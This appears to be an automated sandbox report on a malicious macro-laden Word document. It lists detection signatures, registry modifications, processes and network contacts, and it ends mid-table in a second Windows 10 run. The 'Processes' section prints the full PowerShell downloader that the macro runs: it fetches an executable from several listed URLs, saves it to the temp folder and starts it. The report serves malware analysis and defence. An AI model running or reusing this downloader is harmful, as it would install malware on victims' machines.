Analysis Overview
SHA256
ff717fe800f0aaf182856e2f7cfda5ec0744d0f5f591fce6e6b07e67aecd8bcc
Threat Level: Known bad
The file 747c9d7f8042899383819dbfa708255b_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Office macro that triggers on suspicious action
Suspicious Office macro
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 05:39
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 05:39
Reported
2024-05-26 05:41
Platform
win7-20240221-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | \??\c:\windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\747c9d7f8042899383819dbfa708255b_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
\??\c:\windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $wvt='ZRS';$Rtd='http://thienuyscit.com/Y6Kp3Cv@http://fashionandhomestyle.com/tyoinvur/wtuds/3HjqiOIHre@http://bnsgroupbd.com/KPGAeXAeEc@http://icart.lk/C5YbDhP@http://osadchy.co.il/8Y1DRnG'.Split('@');$jiW=([System.IO.Path]::GetTempPath()+'\nKt.exe');$jWb =New-Object -com 'msxml2.xmlhttp';$dPf = New-Object -com 'adodb.stream';foreach($mHv in $Rtd){try{$jWb.open('GET',$mHv,0);$jWb.send();$dPf.open();$dPf.type = 1;$dPf.write($jWb.responseBody);$dPf.savetofile($jiW);Start-Process $jiW;break}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thienuyscit.com | udp |
| US | 8.8.8.8:53 | fashionandhomestyle.com | udp |
| US | 160.153.0.79:80 | fashionandhomestyle.com | tcp |
| US | 8.8.8.8:53 | bnsgroupbd.com | udp |
| US | 173.236.95.18:80 | bnsgroupbd.com | tcp |
| US | 8.8.8.8:53 | icart.lk | udp |
| US | 8.8.8.8:53 | osadchy.co.il | udp |
Files
memory/2976-0-0x000000002F021000-0x000000002F022000-memory.dmp
memory/2976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-2-0x000000007160D000-0x0000000071618000-memory.dmp
memory/2976-7-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-8-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-9-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-10-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-13-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-12-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-11-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-6-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2616-21-0x00000000056C0000-0x000000000571B000-memory.dmp
memory/2616-22-0x00000000064B0000-0x00000000065E3000-memory.dmp
memory/2976-26-0x000000007160D000-0x0000000071618000-memory.dmp
memory/2976-27-0x0000000000620000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 5f61eef627555bd85cf7ee047b8fb0fd |
| SHA1 | dca3a760aacac5da474cc5c43612d88bb5e6625f |
| SHA256 | 21ed6672082f3dfaac8ea53db4825fcd38c1d9f5cd9501c1599772fb3be8b827 |
| SHA512 | d852acfa7aed9f71efff9c088979a4bb198cf9b39f1888068939d778e4ed8bd687abed39a46d168f5dabfdd1ca8d2ec54a248f529f703558af1854ba29443891 |
memory/2976-42-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-43-0x000000007160D000-0x0000000071618000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 05:39
Reported
2024-05-26 05:41
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
148s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
